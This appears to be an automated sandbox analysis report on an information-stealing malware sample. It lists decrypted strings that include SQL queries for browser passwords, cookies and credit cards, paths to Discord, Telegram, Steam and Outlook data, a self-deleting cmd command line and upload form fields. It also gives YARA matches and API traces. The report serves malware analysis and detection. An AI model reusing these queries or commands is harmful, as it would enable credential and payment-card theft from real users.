                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: RegEnumKeyExA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: RegOpenKeyExA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: RegCloseKey
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: RegEnumValueA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CryptBinaryToStringA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CryptUnprotectData
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SHGetFolderPathA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: ShellExecuteExA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: InternetOpenUrlA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: InternetConnectA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: InternetCloseHandle
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: InternetOpenA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: HttpSendRequestA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: HttpOpenRequestA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: InternetReadFile
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: InternetCrackUrlA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: StrCmpCA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: StrStrA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: StrCmpCW
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: PathMatchSpecA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: GetModuleFileNameExA
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: RmStartSession
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: RmRegisterResources
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: RmGetList
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: RmEndSession
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: sqlite3_open
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: sqlite3_prepare_v2
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: sqlite3_step
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: sqlite3_column_text
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: sqlite3_finalize
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: sqlite3_close
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: sqlite3_column_bytes
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: sqlite3_column_blob
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: encrypted_key
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: PATH
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: NSS_Init
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: NSS_Shutdown
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: PK11_GetInternalKeySlot
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: PK11_FreeSlot
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: PK11_Authenticate
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: PK11SDR_Decrypt
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: C:\ProgramData\
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: browser:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: profile:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: url:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: login:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: password:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Opera
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: OperaGX
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Network
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: cookies
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: .txt
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: TRUE
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: FALSE
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: autofill
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SELECT name, value FROM autofill
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: history
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: name:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: month:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: year:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: card:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Cookies
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Login Data
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Web Data
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: History
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: logins.json
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: formSubmitURL
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: usernameField
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: encryptedUsername
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: encryptedPassword
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: guid
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: cookies.sqlite
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: formhistory.sqlite
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: places.sqlite
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: plugins
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Local Extension Settings
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Sync Extension Settings
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: IndexedDB
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Opera Stable
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Opera GX Stable
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: CURRENT
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: chrome-extension_
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: _0.indexeddb.leveldb
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Local State
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: profiles.ini
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: chrome
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: opera
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: firefox
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: wallets
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: %08lX%04lX%lu
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: ProductName
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: ProcessorNameString
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: DisplayName
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: DisplayVersion
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Network Info:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - IP: IP?
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - Country: ISO?
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: System Summary:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - HWID:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - OS:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - Architecture:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - UserName:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - Computer Name:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - Local Time:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - UTC:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - Language:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - Keyboards:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - Laptop:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - Running Path:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - CPU:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - Threads:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - Cores:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - RAM:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - Display Resolution:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: - GPU:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: User Agents:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Installed Apps:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: All Users:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Current User:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Process List:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: system_info.txt
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: freebl3.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: mozglue.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: msvcp140.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: nss3.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: softokn3.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: vcruntime140.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: \Temp\
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: .exe
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: runas
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: open
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: /c start
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: %DESKTOP%
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: %APPDATA%
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: %LOCALAPPDATA%
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: %USERPROFILE%
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: %DOCUMENTS%
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: %PROGRAMFILES%
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: %PROGRAMFILES_86%
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: %RECENT%
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: *.lnk
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: files
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: \discord\
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: \Local Storage\leveldb
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: \Telegram Desktop\
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: key_datas
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: D877F783D5D3EF8C*
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: map*
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: A7FDF864FBC10B77*
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: A92DAA6EA6F891F2*
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: F8806DD0C461824F*
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Telegram
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: *.tox
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: *.ini
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Password
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: 00000001
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: 00000002
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: 00000003
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: 00000004
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: \Outlook\accounts.txt
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Pidgin
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: \.purple\
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: accounts.xml
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: dQw4w9WgXcQ
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: token:
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Software\Valve\Steam
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: SteamPath
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: \config\
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: ssfn*
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: config.vdf
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: DialogConfig.vdf
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: libraryfolders.vdf
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: loginusers.vdf
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: \Steam\
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: sqlite3.dll
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: browsers
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: done
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: soft
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: \Discord\tokens.txt
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: https
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: POST
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: HTTP/1.1
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: Content-Disposition: form-data; name="
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: hwid
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: build
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: token
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: file_name
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: file
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: message
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                              Source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpackString decryptor: screenshot.jpg
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00409540
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_004155A0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00406C10
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_004094A0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,1_2_0040BF90
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B086C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,1_2_6B086C80
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C71A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,1_2_6C71A9A0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C714440 PK11_PrivDecrypt,1_2_6C714440
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6E4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,1_2_6C6E4420
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7144C0 PK11_PubEncrypt,1_2_6C7144C0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000E4280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_000E4280
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000E45A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,5_2_000E45A0

                              Exploits

                              barindex
                              Source: Yara matchFile source: 5.2.run.exe.3c1a15b.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.cmd.exe.57b4e64.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.2.run.exe.3ea215b.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.run.exe.3bd686d.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.56bbe64.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.2.run.exe.3e5e86d.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.cmd.exe.5770976.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.2.run.exe.3ea2d5b.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.56bb264.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.5677976.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.run.exe.3c1ad5b.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.cmd.exe.57b4264.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: run.exe PID: 5324, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6252, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: run.exe PID: 6612, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6176, type: MEMORYSTR

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeUnpacked PE file: 0.2.TNQTc6Qmkg.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeUnpacked PE file: 1.2.u3bs.0.exe.400000.0.unpack
                              Source: TNQTc6Qmkg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49757 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 169.150.236.99:443 -> 192.168.2.4:49761 version: TLS 1.2
                              Source: Binary string: mozglue.pdbP source: u3bs.0.exe, 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.1.dr
                              Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr
                              Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000005.00000002.2297845560.000000006C867000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000D.00000002.2732283280.000000006AF27000.00000002.00000001.01000000.0000000A.sdmp
                              Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr
                              Source: Binary string: PC:\puvosipuru_cece\hifikedaze\16 fimicupufe\xilucusamitavu_tub.pdb source: TNQTc6Qmkg.exe, 00000000.00000003.1729507004.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000000.1726640432.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                              Source: Binary string: nss3.pdb@ source: u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr
                              Source: Binary string: C:\nezudavoxuyel-61\padij\piw.pdb source: TNQTc6Qmkg.exe
                              Source: Binary string: C:\puvosipuru_cece\hifikedaze\16 fimicupufe\xilucusamitavu_tub.pdb source: TNQTc6Qmkg.exe, 00000000.00000003.1729507004.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000000.1726640432.0000000000413000.00000002.00000001.01000000.00000005.sdmp
